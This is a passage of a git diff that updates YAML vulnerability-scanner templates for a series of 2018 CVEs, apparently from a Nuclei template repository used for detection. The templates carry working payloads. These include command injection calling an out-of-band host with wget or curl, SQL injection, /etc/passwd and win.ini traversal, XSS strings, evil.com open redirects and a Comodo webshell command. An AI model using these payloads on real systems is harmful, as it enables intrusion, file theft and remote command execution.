"{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1" + matchers-condition: and matchers: - type: word @@ -27,10 +39,13 @@ requests: - "" - "is not allowed to open debug sessions" condition: and + - type: word part: header words: - text/html + - type: status status: - 200 +# digest: 4b0a00483046022100aea03256dfa10f799e16725ed2c477051df7bd5443429430877c7241e7fc0fd20221008e27e4cb55ea479e8ed7968f3d87766558b2db1bb677aa21da962d79c9b724f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-10818.yaml b/poc/cve/CVE-2018-10818.yaml index 68e9b68b7e..844ff2c7e6 100644 --- a/poc/cve/CVE-2018-10818.yaml +++ b/poc/cve/CVE-2018-10818.yaml @@ -1,40 +1,32 @@ id: CVE-2018-10818 info: - name: LG NAS Devices - Remote Code Execution + name: LG NAS Devices - Remote Code Execution (Unauthenticated) author: gy741 severity: critical - description: LG NAS devices contain a pre-auth remote command injection via the "password" parameter. - remediation: | - Apply the latest firmware update provided by LG to mitigate this vulnerability. + description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the "password" parameter. reference: - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10818 classification: cve-id: CVE-2018-10818 - metadata: - max-request: 2 tags: cve,cve2018,lg-nas,rce,oast,injection -variables: - useragent: '{{rand_base(6)}}' -http: +requests: - raw: - | POST /system/sharedir.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' + &uid=10; wget http://{{interactsh-url}} + - | POST /en/php/usb_sync.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' - - stop-at-first-match: true + &act=sync&task_number=1;wget http://{{interactsh-url}} matchers-condition: and matchers: @@ -43,9 +35,6 @@ http: words: - "http" - - type: word - part: interactsh_request - words: - - "User-Agent: {{useragent}}" - -# digest: 4a0a00473045022100ccb2d026c1bdc3df10c2c02d7bc19b1059c4e40e9ba5b5dcd07f77a4900f0e1502203ebc6f5387949a63d6f6166a279ef005ec5bec4c4caaf3df125ce8265eb44bc5:922c64590222798bb761d5b6d8e72950 + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2018-11231.yaml b/poc/cve/CVE-2018-11231.yaml index 09f1afc8d4..9412a5f837 100644 --- a/poc/cve/CVE-2018-11231.yaml +++ b/poc/cve/CVE-2018-11231.yaml @@ -1,53 +1,38 @@ id: CVE-2018-11231 - info: name: Opencart Divido - Sql Injection author: ritikchaddha severity: high description: | OpenCart Divido plugin is susceptible to SQL injection - remediation: | - Apply the official patch or upgrade to a version that includes the fix. reference: - - https://web.archive.org/web/20220331072310/http://foreversong.cn/archives/1183 - - https://nvd.nist.gov/vuln/detail/CVE-2018-11231 - http://foreversong.cn/archives/1183 + - https://nvd.nist.gov/vuln/detail/CVE-2018-11231 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.1 + cvss-score: 8.10 cve-id: CVE-2018-11231 cwe-id: CWE-89 - epss-score: 0.00903 - epss-percentile: 0.8091 - cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:* - metadata: - max-request: 1 - vendor: divido - product: divido - framework: opencart - tags: cve,cve2018,opencart,sqli,intrusive + tags: cve,cve2018,opencart,sqli variables: num: "999999999" - -http: +requests: - raw: - | POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1 Host: {{Hostname}} {"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)"},"status":2} - - host-redirects: true + redirects: true max-redirects: 2 - matchers-condition: and matchers: - type: word part: body words: - - "{{md5({{num}})}}" - + - '{{md5({{num}})}}' - type: status status: - 200 -# digest: 4b0a00483046022100e097fb68acef8081c15a24cfab0a6fe80c14be77655c0bfccb9ce47d778f094a022100b25d66c34f140c8fc9f5c19f2cea92f597b26108bed4915d6fc1c3e2a46fd044:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/19 diff --git a/poc/cve/CVE-2018-14064.yaml b/poc/cve/CVE-2018-14064.yaml index 7d0ea6a373..5e29e1cb36 100644 --- a/poc/cve/CVE-2018-14064.yaml +++ b/poc/cve/CVE-2018-14064.yaml @@ -1,43 +1,30 @@ id: CVE-2018-14064 - info: name: VelotiSmart Wifi - Directory Traversal author: 0x_Akoko severity: critical description: VelotiSmart WiFi B-380 camera devices allow directory traversal via the uc-http service 1.0.0, as demonstrated by /../../etc/passwd on TCP port 80. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in VelotiSmart Wifi. reference: - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - https://www.exploit-db.com/exploits/45030 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064 - - https://medium.com/%40s1kr10s/velotismart-0day-ca5056bcdcac classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-14064 cwe-id: CWE-22 - epss-score: 0.15755 - epss-percentile: 0.95389 - cpe: cpe:2.3:o:velotismart_project:velotismart_wifi_firmware:b-380:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: velotismart_project - product: velotismart_wifi_firmware - tags: edb,cve,cve2018,lfi,camera,iot - -http: + tags: cve,cve2018,lfi,camera,iot +requests: - method: GET path: - "{{BaseURL}}/../../etc/passwd" - matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 -# digest: 4b0a00483046022100ae59814b868fcf83d53efc8ed19dab194169cc8c54b32f6d49d6efefa6e1e79d0221009990b36de988d321a87f8e491bf4c205000c4c0d29d918c6dcc7c9c056b44873:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/05/12 diff --git a/poc/cve/CVE-2018-14912.yaml b/poc/cve/CVE-2018-14912.yaml index 8fd8fe4802..f54857e4e3 100644 --- a/poc/cve/CVE-2018-14912.yaml +++ b/poc/cve/CVE-2018-14912.yaml @@ -1,44 +1,27 @@ id: CVE-2018-14912 - info: - name: cgit < 1.2.1 - Directory Traversal + name: cgit < 1.2.1 Directory Traversal author: 0x_Akoko - severity: high - description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request. - remediation: | - Upgrade cgit to version 1.2.1 or later to mitigate the vulnerability. + severity: critical + description: cgit_clone_objects in CGit before 1.2.1 has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request. reference: - https://cxsecurity.com/issue/WLB-2018080034 - https://nvd.nist.gov/vuln/detail/CVE-2018-14912 - - https://lists.zx2c4.com/pipermail/cgit/2018-August/004176.html - - https://bugs.chromium.org/p/project-zero/issues/detail?id=1627 - - https://lists.debian.org/debian-lts-announce/2018/08/msg00005.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-14912 cwe-id: CWE-22 - epss-score: 0.96633 - epss-percentile: 0.9953 - cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: cgit_project - product: cgit - tags: cve,cve2018,cgit,lfi - -http: + tags: cve,cve18,Cgit,lfi +requests: - method: GET path: - "{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd" - matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 -# digest: 490a0046304402206482c0ca92c15f38ede4738b7bdc3e1df5a57e7895875742a9a0e71ae236caf0022005078fd001d2e64ae8b4472db736e3f910da9be7529f1c2e7b2968ab6a033bb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-15517.yaml b/poc/cve/CVE-2018-15517.yaml index 9e4dd5523e..e90608b124 100644 --- a/poc/cve/CVE-2018-15517.yaml +++ b/poc/cve/CVE-2018-15517.yaml @@ -1,32 +1,21 @@ id: CVE-2018-15517 info: - name: D-Link Central WifiManager - Server-Side Request Forgery - author: gy741 - severity: high - description: D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser. - remediation: | - Apply the latest security patches or updates provided by D-Link to fix the SSRF vulnerability in Central WifiManager. + name: D-LINK Central WifiManager Server-Side Request Forgery + description: "D-LINK Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser." reference: - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15517 - - http://seclists.org/fulldisclosure/2018/Nov/28 - - http://packetstormsecurity.com/files/150243/D-LINK-Central-WifiManager-CWM-100-1.03-r0098-Server-Side-Request-Forgery.html + author: gy741 + severity: high classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N - cvss-score: 8.6 + cvss-score: 8.60 cve-id: CVE-2018-15517 cwe-id: CWE-918 - epss-score: 0.01414 - epss-percentile: 0.84999 - cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: dlink - product: central_wifimanager - tags: seclists,packetstorm,cve,cve2018,dlink,ssrf,oast + tags: cve,cve2018,dlink,ssrf,oast -http: +requests: - method: GET path: - "{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/" @@ -36,4 +25,5 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a0046304402202861e562e6dc026290094fe3f562cff6f060b2af0d856cad1d55f92e4a7db2530220629ab9cf1f9112b6f2e99ca75ddda4840b60919ae9c7a9841d82cc9ce9f7e166:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/04/06 diff --git a/poc/cve/CVE-2018-15535.yaml b/poc/cve/CVE-2018-15535.yaml index ed7aa501ed..6f97db14dd 100644 --- a/poc/cve/CVE-2018-15535.yaml +++ b/poc/cve/CVE-2018-15535.yaml @@ -1,9 +1,12 @@ id: CVE-2018-15535 + info: name: Responsive FileManager <9.13.4 - Local File Inclusion author: daffainfo severity: high - description: Responsive FileManager before version 9.13.4 is susceptible to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory. Instead, because it does not properly neutralize get_file sequences such as ".." can resolve to a location that is outside of that directory, aka local file inclusion. + description: Responsive FileManager before version 9.13.4 is vulnerable to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion. + remediation: | + Upgrade to Responsive FileManager version 9.13.4 or later to fix the vulnerability. reference: - https://www.exploit-db.com/exploits/45271 - https://nvd.nist.gov/vuln/detail/CVE-2018-15535 @@ -14,18 +17,27 @@ info: cvss-score: 7.5 cve-id: CVE-2018-15535 cwe-id: CWE-22 - tags: cve,cve2018,lfi -requests: + epss-score: 0.97149 + epss-percentile: 0.99749 + cpe: cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: tecrail + product: responsive_filemanager + tags: cve,cve2018,lfi,edb,seclists + +http: - method: GET path: - "{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 - -# Enhanced by mp on 2022/07/07 +# digest: 4a0a00473045022100ee54f126d8edd15e9cb9f4990712d5840ff03d732e20f4e3f54303eb7fa3fc7d0220303e1555f5ef9261aebca77c01c5cd22ed6f57d5cfbdb590e1292d398826add4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-16133.yaml b/poc/cve/CVE-2018-16133.yaml index 05ebf34a12..bf652a55d2 100644 --- a/poc/cve/CVE-2018-16133.yaml +++ b/poc/cve/CVE-2018-16133.yaml @@ -1,32 +1,20 @@ id: CVE-2018-16133 - info: - name: Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion + name: Cybrotech CyBroHttpServer 1.0.3 Directory Traversal author: 0x_Akoko severity: medium - description: Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Cybrotech CyBroHttpServer 1.0.3. + description: Cybrotech CyBroHttpServer 1.0.3 allows Directory Traversal in the URI. reference: - https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html - http://www.cybrotech.com/ - - https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal - - https://nvd.nist.gov/vuln/detail/CVE-2018-16133 + - https://www.cvedetails.com/cve/CVE-2018-16133 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2018-16133 cwe-id: CWE-22 - epss-score: 0.05113 - epss-percentile: 0.92093 - cpe: cpe:2.3:a:cybrotech:cybrohttpserver:1.0.3:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: cybrotech - product: cybrohttpserver - tags: lfi,packetstorm,cve,cve2018,cybrotech - -http: + tags: cve,cve2018,cybrotech,lfi +requests: - raw: - |+ GET \..\..\..\..\Windows\win.ini HTTP/1.1 @@ -41,4 +29,3 @@ http: - "fonts" - "extensions" condition: and -# digest: 4b0a00483046022100803913dd9f8320843c85f7cbb2dbe6ba641aa63e4c1e3b55e636899455cb1798022100feae4373fbfd611b245c3d788d3cea8dc09c798b264cd6007f4250615addddfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-16167.yaml b/poc/cve/CVE-2018-16167.yaml index 59d9a3a939..e193b85e20 100644 --- a/poc/cve/CVE-2018-16167.yaml +++ b/poc/cve/CVE-2018-16167.yaml @@ -1,19 +1,32 @@ id: CVE-2018-16167 + info: - name: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated) + name: LogonTracer <=1.2.0 - Remote Command Injection author: gy741 severity: critical description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. + remediation: | + Upgrade LogonTracer to a version higher than 1.2.0. reference: - https://www.exploit-db.com/exploits/49918 - https://nvd.nist.gov/vuln/detail/CVE-2018-16167 - tags: cve,cve2018,logontracer,rce,oast + - https://jvn.jp/en/vu/JVNVU98026636/index.html + - https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.1 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-16167 cwe-id: CWE-78 -requests: + epss-score: 0.18435 + epss-percentile: 0.95688 + cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: jpcert + product: logontracer + tags: rce,oast,edb,cve,cve2018,logontracer,intrusive + +http: - raw: - | POST /upload HTTP/1.1 @@ -21,9 +34,11 @@ requests: Content-Type: application/x-www-form-urlencoded logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B + matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - - "http" + - http +# digest: 490a00463044022025e177cf9f3e841bdd26660dad29f135ac4ef554ade59e61e09c07555d1477ae02205391af384220fca53b325c708351e6e7e7f7200b91b6fa9ef79322663d8fd849:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-16288.yaml b/poc/cve/CVE-2018-16288.yaml index d31045c5bb..69092bb0f3 100644 --- a/poc/cve/CVE-2018-16288.yaml +++ b/poc/cve/CVE-2018-16288.yaml @@ -4,25 +4,35 @@ info: name: LG SuperSign EZ CMS 2.5 - Local File Inclusion author: daffainfo severity: high - description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs. + description: | + LG SuperSign CMS 2.5 allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs - aka local file inclusion. + remediation: | + Apply the latest security patches or upgrade to a patched version of LG SuperSign EZ CMS. reference: - https://www.exploit-db.com/exploits/45440 - - https://www.cvedetails.com/cve/CVE-2018-16288 - tags: cve,cve2018,lfi + - http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html + - https://nvd.nist.gov/vuln/detail/CVE-2018-16288 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.60 + cvss-score: 8.6 cve-id: CVE-2018-16288 cwe-id: CWE-200 + epss-score: 0.16221 + epss-percentile: 0.95454 + cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: lg + product: supersign_cms + tags: cve,cve2018,lfi,supersign,edb -requests: +http: - method: GET path: - "{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd" matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -30,3 +40,4 @@ requests: - type: status status: - 200 +# digest: 4a0a0047304502207c11a0436c74c411a524e4d97a3c58de9a6e671debf9913b3dbcc641c5adaa65022100f11eb819310a6d1ed412d7db13481be3b29aac7869268ca9a41f24aa844276ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-17422.yaml b/poc/cve/CVE-2018-17422.yaml index c80e6df90f..68f71442de 100644 --- a/poc/cve/CVE-2018-17422.yaml +++ b/poc/cve/CVE-2018-17422.yaml @@ -1,43 +1,34 @@ id: CVE-2018-17422 - info: - name: DotCMS < 5.0.2 - Open Redirect + name: dotCMS < 5.0.2 - Open Redirect author: 0x_Akoko,daffainfo severity: medium description: | - dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - remediation: | - Upgrade to a version of DotCMS that is higher than 5.0.2 to mitigate the open redirect vulnerability. + dotCMS before 5.0.2 has open redirects via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. reference: - https://github.com/dotCMS/core/issues/15286 - - https://nvd.nist.gov/vuln/detail/CVE-2018-17422 + - https://www.cvedetails.com/cve/CVE-2018-17422 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-17422 cwe-id: CWE-601 - epss-score: 0.00118 - epss-percentile: 0.45709 - cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 2 - vendor: dotcms - product: dotcms shodan-query: http.title:"dotCMS" + verified: "true" tags: cve,cve2018,redirect,dotcms - -http: +requests: - method: GET path: - - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com' - - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com' - + - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh' + - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh' stop-at-first-match: true + matchers-condition: and matchers: - type: word part: body words: - - "self.location = 'http://evil.com'" - - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'" -# digest: 490a00463044022069e79958c8d7b6061fe4dff9e3c42b83b2a60b6430d6ce7640cf6c1250aeac45022011f8d21eb433c95b6f499d4a23b57ccb8f5788c1aff99305cbf1db3af44d823d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - "self.location = 'http://www.interact.sh'" + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2018-17431.yaml b/poc/cve/CVE-2018-17431.yaml index 43bc26ce6b..a95adc99ce 100644 --- a/poc/cve/CVE-2018-17431.yaml +++ b/poc/cve/CVE-2018-17431.yaml @@ -1,21 +1,33 @@ id: CVE-2018-17431 + info: name: Comodo Unified Threat Management Web Console - Remote Code Execution author: dwisiswant0 severity: critical description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 are susceptible to a web shell based remote code execution vulnerability. + remediation: | + Apply the latest security patches or updates provided by Comodo to fix this vulnerability. reference: - https://www.exploit-db.com/exploits/48825 - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276 - https://nvd.nist.gov/vuln/detail/CVE-2018-17431 - https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437 + - https://drive.google.com/file/d/0BzFJhNQNHcoTbndsUmNjVWNGYWNJaWxYcWNyS2ZDajluTDFz/view classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-17431 cwe-id: CWE-287 - tags: cve,cve2018,comodo,rce -requests: + epss-score: 0.10458 + epss-percentile: 0.94426 + cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: comodo + product: unified_threat_management_firewall + tags: cve2018,comodo,rce,edb,cve + +http: - raw: - | GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1 @@ -25,14 +37,15 @@ requests: GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1 Host: {{Hostname}} Connection: close + matchers-condition: and matchers: - type: word + part: body words: - "Configuration has been altered" - part: body + - type: status status: - 200 - -# Enhanced by mp on 2022/05/13 +# digest: 490a0046304402201f1a49f2400315ab1ac93a3089241aa3426fb961fc7a4d15a7c15ffc2f48a9b30220025cb3006dd565ae3d0d11224175ebbfddeb3c50d1494791e88f281087a2bb41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-18608.yaml b/poc/cve/CVE-2018-18608.yaml index c8501bfe0f..a9d9e5059a 100644 --- a/poc/cve/CVE-2018-18608.yaml +++ b/poc/cve/CVE-2018-18608.yaml @@ -1,27 +1,38 @@ id: CVE-2018-18608 + info: - name: DedeCMS V5.7 - Cross Site Scripting + name: DedeCMS 5.7 SP2 - Cross-Site Scripting author: ritikchaddha severity: medium description: | - DedeCMS 5.7 SP2 allows XSS via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php. + DedeCMS 5.7 SP2 is vulnerable to cross-site scripting via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php. + remediation: | + Upgrade to the latest version of DedeCMS or apply the official patch provided by the vendor to fix the XSS vulnerability. reference: - https://github.com/ky-j/dedecms/issues/8 - - https://nvd.nist.gov/vuln/detail/CVE-2018-18608 - https://github.com/ky-j/dedecms/files/2504649/Reflected.XSS.Vulnerability.exists.in.the.file.of.DedeCMS.V5.7.SP2.docx + - https://nvd.nist.gov/vuln/detail/CVE-2018-18608 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-18608 cwe-id: CWE-79 + epss-score: 0.00177 + epss-percentile: 0.54825 + cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: dedecms + product: dedecms shodan-query: http.html:"DedeCms" - verified: "true" tags: dedecms,xss,cve,cve2018 -requests: + +http: - method: GET path: - "{{BaseURL}}/plus/feedback.php/rp4hu%27>" - "DedeCMS Error Warning!" condition: and + - type: word part: header words: - text/html + - type: status status: - 200 +# digest: 4b0a00483046022100cf72a0f99d4ef20277ade314c91475ba279deec461e23dc12ff37f0824739383022100b0601d502d876a69456aba5ba214fc3189e4da3c72c99fd569c6e45e03c559b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-19752.yaml b/poc/cve/CVE-2018-19752.yaml index c93fd4dfd0..4876f6389a 100644 --- a/poc/cve/CVE-2018-19752.yaml +++ b/poc/cve/CVE-2018-19752.yaml @@ -1,33 +1,23 @@ id: CVE-2018-19752 - info: name: DomainMOD 4.11.01 - Cross-Site Scripting author: arafatansari severity: medium description: | - DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar. - remediation: | - Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. + DomainMOD through 4.11.01 has XSS via the assets/add/registrar.php notes,registrar field. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-19752 - https://github.com/domainmod/domainmod/issues/84 - https://www.exploit-db.com/exploits/45949/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-19752 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2018-19752 cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39994 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 3 - vendor: domainmod - product: domainmod - tags: cve,cve2018,domainmod,xss,authenticated,edb - -http: + verified: "true" + tags: cve,cve2018,domainmod,xss,authenticated +requests: - raw: - | POST / HTTP/1.1 @@ -44,23 +34,19 @@ http: - | GET /assets/registrars.php HTTP/1.1 Host: {{Hostname}} - - host-redirects: true + cookie-reuse: true + redirects: true max-redirects: 2 - matchers-condition: and matchers: - type: word part: body words: - '">' - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4b0a004830460221009072657a99210938964ec568821cc0e778ad43fc14982d266dc8d86f6410796e022100d0f238aeadc144c7fa99f7bde229ac1c8d4b125d771c634cc8dfd8427e4ec9b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-19877.yaml b/poc/cve/CVE-2018-19877.yaml index 0499aa736c..1a7a7645d2 100644 --- a/poc/cve/CVE-2018-19877.yaml +++ b/poc/cve/CVE-2018-19877.yaml @@ -1,50 +1,35 @@ id: CVE-2018-19877 - info: - name: Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting + name: Adiscon LogAnalyzer 4.1.7 - Cross Site Scripting author: arafatansari severity: medium description: | - Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file. - remediation: | - Upgrade Adiscon LogAnalyzer to version 4.1.7 or later to mitigate this vulnerability. + Adiscon LogAnalyzer before 4.1.7 is affected by Cross-Site Scripting (XSS) in the 'referer' parameter of the login.php file. reference: - https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/ - https://www.exploit-db.com/exploits/45958/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-19877 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-19877 cwe-id: CWE-79 - epss-score: 0.00241 - epss-percentile: 0.61992 - cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: adiscon - product: loganalyzer - tags: adiscon,xss,edb,cve,cve2018 - -http: + verified: "true" + tags: cve,cve2018,adiscon,xss +requests: - method: GET path: - "{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E" - matchers-condition: and matchers: - type: word part: body words: - 'value="">' - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4b0a0048304602210080774383cb9e8861a3c0c9fa89f24ff791992772b83a7222a7ed6a682798df51022100898df70370395c6450bb0ff0f67665661c3b54c9ad9dc7cde6cc21fdc668c9c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-20010.yaml 